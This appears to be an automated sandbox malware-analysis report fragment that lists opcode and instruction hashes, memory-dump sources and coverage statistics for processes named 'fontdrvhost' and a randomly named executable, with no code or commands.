                                                                                                                    • Instruction ID: 3f026fdbdd8fdcf8607f9e5e2d8783ca22b8edf870a3fd61cb257eb1c7368421
                                                                                                                    • Opcode Fuzzy Hash: d267d3a3a5bbc860cfb3399a4170e9c99f926f800885bde2cb025a28a2959771
                                                                                                                    • Instruction Fuzzy Hash: C371A130E1C64A8FEBA5DB64C8AA6BDBBA1FF46300F14057ED10ED7295DA2C6841E710
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f7ff6c59a1bed29f0984c4c7fee7fb8f07e6351fa1748005db8a8a6c81803e01
                                                                                                                    • Instruction ID: 2fd54318f61ea46cb31b813bf61d90fa6c4107c462bf91fe556a8ab236d43d41
                                                                                                                    • Opcode Fuzzy Hash: f7ff6c59a1bed29f0984c4c7fee7fb8f07e6351fa1748005db8a8a6c81803e01
                                                                                                                    • Instruction Fuzzy Hash: 75215E31B1C6068BE678DE28D0E143973E5EF5E744B60163DDA8FC338ADE6CB8026651
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0deafe1946f5cf9292baf1f3bf1d4cece4f57f8b4ca9a964a47bbe70eaea28a6
                                                                                                                    • Instruction ID: dd7e1116cbdd8fec5152e82b03e4866ae108d513b38dd1ace8383973236858a9
                                                                                                                    • Opcode Fuzzy Hash: 0deafe1946f5cf9292baf1f3bf1d4cece4f57f8b4ca9a964a47bbe70eaea28a6
                                                                                                                    • Instruction Fuzzy Hash: 51212C31A1C94E8FDB95DF58C8A05EDBBB1FF69310F10017AD10AE7295DA386941DB50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ac4dd3580c996790eb08a448dc478d2c8e811ad9681366ed88b8a57021054563
                                                                                                                    • Instruction ID: 2be7435e085c8d10f7de5f3c029c90eb73396346264803dff3ee3d11bef8fbcf
                                                                                                                    • Opcode Fuzzy Hash: ac4dd3580c996790eb08a448dc478d2c8e811ad9681366ed88b8a57021054563
                                                                                                                    • Instruction Fuzzy Hash: 50218335F2C6068BE6BCDA18C4A013972E5FF5A304B21057DD69FD3789DE2CB8026696
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 160f74020228772666ee14c029e5e7b448c15014666484059337e3dca71b0248
                                                                                                                    • Instruction ID: 1b73f57aeea14d74e520eb96d154db7f2edae2b95523eeae5fa65b48f351b003
                                                                                                                    • Opcode Fuzzy Hash: 160f74020228772666ee14c029e5e7b448c15014666484059337e3dca71b0248
                                                                                                                    • Instruction Fuzzy Hash: 52213A74E1895E9FCB84DF98C4A09EDB7B1FF49300F50013AD10AE3291DA3DA9059B50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c89e010bc2266d898f01a2e9b6c8cb8290c208c902a807eaccd14214630d150a
                                                                                                                    • Instruction ID: bda8b29a66082cda72846e4d73bcfa2b53ff171523a5f33f8591e59903293b42
                                                                                                                    • Opcode Fuzzy Hash: c89e010bc2266d898f01a2e9b6c8cb8290c208c902a807eaccd14214630d150a
                                                                                                                    • Instruction Fuzzy Hash: F021EA70E0895D8FDF99DB58C4AAAACB7B1FF69301F14016DC10EE7295CB35A881DB10
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2228076213.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b3cae84655fbbdc49b8973b4cbcc2cd00feb06a5c9d2548d7c79b3379d52cc79
                                                                                                                    • Instruction ID: fbca84486fa941f6ec5ce1667ac8ef2a593731f53f5d5fe55dca1d01612adc23
                                                                                                                    • Opcode Fuzzy Hash: b3cae84655fbbdc49b8973b4cbcc2cd00feb06a5c9d2548d7c79b3379d52cc79
                                                                                                                    • Instruction Fuzzy Hash: 12218631E1C82E4EEB95EB1898A43B862E0FF47311F1401F9D54FE3292DE2CAC419740
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3c68131767bf49d2cef3fbfca3ee030b422b86e3f86851fcc1c6e7cd18fa22ce
                                                                                                                    • Instruction ID: 57cade49e07d053cbc68feaf870a53cbdc0e244dd61276854f773ad4b9a4e45c
                                                                                                                    • Opcode Fuzzy Hash: 3c68131767bf49d2cef3fbfca3ee030b422b86e3f86851fcc1c6e7cd18fa22ce
                                                                                                                    • Instruction Fuzzy Hash: 11210971E199099FDB9CDB58C4AAAADB7B1EF59310F0001BED10EE7395CE38A9408B50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 12a9fbb0d8dc3fd93b328867bc4c7bf546f766189381797c31955e95fc344811
                                                                                                                    • Instruction ID: c0f7575fb76becd20b8f5c512773de06615ced984121f45e6418adc37495021f
                                                                                                                    • Opcode Fuzzy Hash: 12a9fbb0d8dc3fd93b328867bc4c7bf546f766189381797c31955e95fc344811
                                                                                                                    • Instruction Fuzzy Hash: F2214C71B1890E9BDB98DF68C4A1978F3A2FF45310B148279D51ED3686CF28BC12DB84
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9e6b790932fd363d2137c0866a0daea9c94ecafd036a70d1ae1a768246fbd11d
                                                                                                                    • Instruction ID: c799a92a586826f099e27ae78e0165374e46642d4e148ca6c692bba15c1e383d
                                                                                                                    • Opcode Fuzzy Hash: 9e6b790932fd363d2137c0866a0daea9c94ecafd036a70d1ae1a768246fbd11d
                                                                                                                    • Instruction Fuzzy Hash: 5311DA20E1C8A6C6FA68CA08C4F49B47391FF56305724467DD55FCB6CEC82CF981A7A0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2cf901c119bc2487b935ea9c71f8cdd9f9b5d0fad98be6a60b63cae66704fe85
                                                                                                                    • Instruction ID: 4d9c953e63554d683341745107691afe8358f6a1ece5d8503285962dcbdebb19
                                                                                                                    • Opcode Fuzzy Hash: 2cf901c119bc2487b935ea9c71f8cdd9f9b5d0fad98be6a60b63cae66704fe85
                                                                                                                    • Instruction Fuzzy Hash: 4C11B710A1C46B46F628C72CC4F49B47395EFA6321B144A7DC64BCB78EC83CB885AF91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2228076213.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cf4f3c26d9e1a3cdb7077d93d1b43c366cfb3a3d234172c17bd15baeda0a5078
                                                                                                                    • Instruction ID: f65b7aa88ae6db2ed1b5371c02c660e694a7f2af208ac021fe7cfefee94f3186
                                                                                                                    • Opcode Fuzzy Hash: cf4f3c26d9e1a3cdb7077d93d1b43c366cfb3a3d234172c17bd15baeda0a5078
                                                                                                                    • Instruction Fuzzy Hash: 8C014732F0D92C0B9629E11D989A936B3C2DBCBB3031512B9E98FC3245DC04FC1342C4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 918b64d0d6985c0bb0bbb4becc99a321822325785c5eb9818c0a4d1283a15c6a
                                                                                                                    • Instruction ID: c40872c36d615d6e681247596e82f3c510c828f727e8828bcff10d447a9f913f
                                                                                                                    • Opcode Fuzzy Hash: 918b64d0d6985c0bb0bbb4becc99a321822325785c5eb9818c0a4d1283a15c6a
                                                                                                                    • Instruction Fuzzy Hash: D4111930A185199FDF9CDB58C4A6ABDB7B1EF59310F4001BED20EE7295CE39A9408B50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2228076213.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bd815eb342c61a54f8b1e067d986ca41bd09dc078b3195529399068b15cb370e
                                                                                                                    • Instruction ID: 68a2cf3d7062e43afe9f168fa23a47f636286c4a3ad883b0dcd8a65085a23ca7
                                                                                                                    • Opcode Fuzzy Hash: bd815eb342c61a54f8b1e067d986ca41bd09dc078b3195529399068b15cb370e
                                                                                                                    • Instruction Fuzzy Hash: 2C11E036F0D3898FE7139B6888A11ECBBB0EF43320F0444F6C246DB192D93C95069781
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3a43edc641d2d6bf559a3553a556e701c521f6a741ad874393024939abc73c18
                                                                                                                    • Instruction ID: 51879daeabc11ced7e70138cae76b09d40d2d396342340613e024b7393189778
                                                                                                                    • Opcode Fuzzy Hash: 3a43edc641d2d6bf559a3553a556e701c521f6a741ad874393024939abc73c18
                                                                                                                    • Instruction Fuzzy Hash: 6111E172F1AA454FEB95FB6488A62AC77A0FF56300F18017DD04AC72D7DE6C6802C701
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e522e2342d1faa5a59cf94f6797c70c5e478346deceaa57dc7e7e1bee045801c
                                                                                                                    • Instruction ID: afe3301284727d43ec427863166a8a898c910652973e91d1786eec3bd8b20e88
                                                                                                                    • Opcode Fuzzy Hash: e522e2342d1faa5a59cf94f6797c70c5e478346deceaa57dc7e7e1bee045801c
                                                                                                                    • Instruction Fuzzy Hash: 30F0492544E2C44FC3029B74CC599A57FE0EF5721570A86EED089CB463C65D858B8711
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2228076213.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_fontdrvhost.jbxd
                                                                                                                    • Opcode Fuzzy Hash: 3ad9b737f9d3a71b5a47652e042b9bbfd47591b0a6598e927983330d6249448c
                                                                                                                    • Instruction Fuzzy Hash: 1EC08C309108088FC908EB28C88481433A0FB0A200BC600D0E00AC7170E219DCC1C740
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 806bd5350af2c5d9d8229089b3c936f36bad06961f7b08ab37019a01ed309f53
                                                                                                                    • Instruction ID: 584f2bd43c10ac0fb37a9bb6d52206684d4944329ab22a1311d06cc798a2f043
                                                                                                                    • Opcode Fuzzy Hash: 806bd5350af2c5d9d8229089b3c936f36bad06961f7b08ab37019a01ed309f53
                                                                                                                    • Instruction Fuzzy Hash: B5D0C914B0C61785F57DC626C0F023E61905F0B740EE4403DC29FC1ED9CD1D78017222
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7164194e321ff11a9c5b58660fdeb581821e2c8107603c55c42c51c06a3cb97c
                                                                                                                    • Instruction ID: 00c1428d9911ced668c157a276569234a56116e865c8be919f70a6388dcd9ad3
                                                                                                                    • Opcode Fuzzy Hash: 7164194e321ff11a9c5b58660fdeb581821e2c8107603c55c42c51c06a3cb97c
                                                                                                                    • Instruction Fuzzy Hash: FEC002207548559FD798DB09C0E5A3872D1FF4E301B9040B8E14BCB3A9C92CA845A620
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2228076213.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5e07570c139ba903f60faee86b7996e5019c602f103a0698bd4de0597cf1848a
                                                                                                                    • Instruction ID: 740b03e8763ee2466f223ec84abcaba5dd3ef7a778192593ad50fd0cb5716c04
                                                                                                                    • Opcode Fuzzy Hash: 5e07570c139ba903f60faee86b7996e5019c602f103a0698bd4de0597cf1848a
                                                                                                                    • Instruction Fuzzy Hash: D4C04C02F1985706F16A6398543167E88466B44745F9501B5E50EDA6C6CD5C9F0253C6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2228076213.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                                                                                                    • Instruction ID: 21ce8d407170d803c709e54e9fc41d3268e142c31d74f4a46492cf06ae1a56fe
                                                                                                                    • Opcode Fuzzy Hash: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                                                                                                    • Instruction Fuzzy Hash: 90B01200D5640F00A405317A08D60F470505F46100FC010F0D60EC0085A84D60942242
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ed35ec1346cc584f31cde17d657c54f0f2fe37f7d96f944b514d113f83dc0509
                                                                                                                    • Instruction ID: 4cf0d399e401924262fb2d8fa052a0b6a5f42f20e9db54247cae85d1d11343f9
                                                                                                                    • Opcode Fuzzy Hash: ed35ec1346cc584f31cde17d657c54f0f2fe37f7d96f944b514d113f83dc0509
                                                                                                                    • Instruction Fuzzy Hash: A0B00200F0C60357F57554B444F507D00411B473D5A540539D71BCE3DBED9C78503175
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2aebecdd2e36bf1967354eff32048307838e4e4d2e178bc7a3520eb964c32095
                                                                                                                    • Instruction ID: 569767a039c15f73955f1914414e2f8a7094f4e86909590b90dd0e143cfd3c60
                                                                                                                    • Opcode Fuzzy Hash: 2aebecdd2e36bf1967354eff32048307838e4e4d2e178bc7a3520eb964c32095
                                                                                                                    • Instruction Fuzzy Hash: 5BB00240F4C20B56E56998B448E507D50410B46295A941AB9971AC53D7DC9C6D4176B1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2228076213.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: c9$!k9$"s9$#{9
                                                                                                                    • API String ID: 0-1692736845

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:5.3%
                                                                                                                    Dynamic/Decrypted Code Coverage:27.8%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:18
                                                                                                                    Total number of Limit Nodes:3

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4614685322.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5Y_H
                                                                                                                    • API String ID: 0-3237497481

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4614685322.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34570000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: *`4$HIa4$PXa4$P\a4$pqa4$wa4
                                                                                                                    • API String ID: 0-3421069954

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4614685322.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34570000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: P\a4$wa4
                                                                                                                    • API String ID: 0-1460514738
                                                                                                                    • Opcode ID: 384e9b3a12bf3263be01514c2077b26470f74b7a77a5e6d9e14b877e430a9629
                                                                                                                    • Instruction ID: 6c4d0921093eb537ccd41be173dece6e49b17f24ad1e1c11d5cd7ce8fa63be1c
                                                                                                                    • Opcode Fuzzy Hash: 384e9b3a12bf3263be01514c2077b26470f74b7a77a5e6d9e14b877e430a9629
                                                                                                                    • Instruction Fuzzy Hash: DD91A131F1C94A4FEB59EB2888E167877E2FF99310B5445B9D44ED32C2DE2CAC429741

                                                                                                                    Control-flow Graph

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4614685322.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34591000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 300efedec8eef7fb36685a8dc4fe267c86eee1a70a08d8a3a9e513b7fb115647
                                                                                                                    • Instruction ID: 4a20a8fd916d779a7d2ada563bd4881825b7fd43e2e5b10f6ee46f51e715cd08
                                                                                                                    • Opcode Fuzzy Hash: 300efedec8eef7fb36685a8dc4fe267c86eee1a70a08d8a3a9e513b7fb115647
                                                                                                                    • Instruction Fuzzy Hash: 35B1133190EBC84FD7579B6488616E57FB1EF57310F0941EBD089CB1E3DA286846CB62

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4621070301.00007FFD34950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34950000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34950000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: HV\4
                                                                                                                    • API String ID: 0-544152353
                                                                                                                    • Opcode ID: f4d994478f51c73c21b37f18fa9e80a75d72de81e7a629f7ff9de41f80d16fb8
                                                                                                                    • Instruction ID: b2c80a1b100e262712dbe17f7eb37f177c8dab6fd6e36124b6a9ea9c06fb2502
                                                                                                                    • Opcode Fuzzy Hash: f4d994478f51c73c21b37f18fa9e80a75d72de81e7a629f7ff9de41f80d16fb8
                                                                                                                    • Instruction Fuzzy Hash: 96D1F330A0DB068FE369CB18D4E457577E1FF56300B2405BEC68AC369ADF2DB8429B65

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4621070301.00007FFD34950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34950000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34950000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 8k4
                                                                                                                    • API String ID: 0-3695509819
                                                                                                                    • Opcode ID: e7a6d22c3490b45763f71a8d3ff58005a0c95edcc0b8838741740d32959a88f5
                                                                                                                    • Instruction ID: d8e3c52fa53e107d7d8e8134d81f0dd37f605f95058650c12a1bf4d4d246d13e
                                                                                                                    • Opcode Fuzzy Hash: e7a6d22c3490b45763f71a8d3ff58005a0c95edcc0b8838741740d32959a88f5
                                                                                                                    • Instruction Fuzzy Hash: 9C813B35F0C4494FE768EA2884A79B837D0FF46310B2402FDD54EC756BDE1CA8069791

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4614685322.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: cL_H
                                                                                                                    • API String ID: 0-879983468
                                                                                                                    • Opcode ID: da65ddf87cc0b04361a09579963b30be2f8978563dc6da4a8953ac81085632c6
                                                                                                                    • Instruction ID: 3baf178250e043eb80045e8ab8b45858cb0f0c24b9fd7decb14b0331db34ba10
                                                                                                                    • Opcode Fuzzy Hash: da65ddf87cc0b04361a09579963b30be2f8978563dc6da4a8953ac81085632c6
                                                                                                                    • Instruction Fuzzy Hash: 9D511531B0CB044FE7599A1CE89667973D1EB9A720F14416EE58DC32A2DE39FC428782

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4621070301.00007FFD34950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34950000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34950000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 0-3916222277
                                                                                                                    • Opcode ID: 939351c225e4b5e2050db17f3d985ef29dce167f930cfdbf8025248d9ad51a82
                                                                                                                    • Instruction ID: 5a7a1764ff3d8a80ed243ba4df235de79878328d4a8ebd42b9bfe61b0b693104
                                                                                                                    • Opcode Fuzzy Hash: 939351c225e4b5e2050db17f3d985ef29dce167f930cfdbf8025248d9ad51a82
                                                                                                                    • Instruction Fuzzy Hash: C7515B31E0864E8FEB59DB98D4A59BDB7B5FF46300F2040BEC01AE7296CA386905DB10
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
